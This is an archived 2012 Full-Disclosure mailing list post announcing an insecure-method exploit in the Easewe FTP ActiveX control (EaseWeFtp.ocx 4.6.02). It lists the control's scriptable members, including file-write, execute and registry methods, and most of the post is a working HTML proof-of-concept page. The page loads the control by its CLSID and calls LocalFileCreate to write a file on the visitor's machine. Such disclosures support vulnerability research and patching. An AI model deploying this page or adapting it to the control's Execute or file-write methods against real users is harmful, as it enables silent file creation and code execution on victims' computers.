lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 8 Aug 2012 06:06:54 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit

Exploit Title: Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
Date: 2012-08-08
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage:http://www.ftpocx.com/download.htm
Version: 4.6.02
Tested on: windows 7
Awesome Hesam BOF
==========================================================================
Class FtpLibrary
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}
Number of Interfaces: 1
Default Interface: _FtpLibrary
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Interface _FtpLibrary : IDispatch
Default Interface: True
Members : 161
	QueueAppend
	QueueRemove
	FormatSize
	FormatFileSize
	FormatTime
	SFDFileName
	SFDFilter
	SFDInitialDir
	SFDTitle
	ShowBrowseFolderDialog
	ShowSaveFileDialog
	ServerName
	Username
	Password
	Port
	RemotePort
	RemotePath
	LocalPath
	ReplaceIndex
	ReplaceSetting
	RenameRule
	Percent
	MKDInfo
	MaxSpeed
	Rcvbuf
	Sndbuf
	Timeout
	RedoTimes
	AllowType
	DenyType
	MaxSize
	Title
	Encoding
	TranstatePath
	KeepAliveCommand
	KeepAliveInterval
	ListCommand
	ListSuffix
	LangInfo
	Info
	SInfo
	Lype
	ExistFile
	GetFileSize
	GetFtpFileSize
	GetFileInfo
	GetFtpFileInfo
	GetFileList
	GetFtpDirectoryInfo
	ExistDirectory
	CreateDirectory
	RemoveDirectory
	DeleteFile
	RenameFile
	SendCommand
	SetCurrentDirectory
	GetFileName
	GetFileNameWithoutExt
	GetFileExtension
	GetParentPath
	LocalFileExists
	LocalFolderExists
	LocalFileCreate
	LocalFolderCreate
	LocalFileDelete
	LocalFileRead
	LocalFileWrite
	GetLocalFileSize
	GetLocalFolderSize
	GetLocalFileCount
	GetLocalFileDate
	GetLocalFileList
	ShowCmd
	Execute
	Explore
	GetDriveNames
	ProxyHost
	ProxyPort
	RegCreate
	RegSetValue
	RegSetValueEx
	RegDelete
	RegDeleteValue
	RegDeleteValueEx
	RegGetValue
	RegGetValueEx
	RegExists
============================================================================
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description There is Insecure Method in (LocalFileCreate) fonction<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>

<SCRIPT>

function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click
here To Test"><br>
</body>
</HTML>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ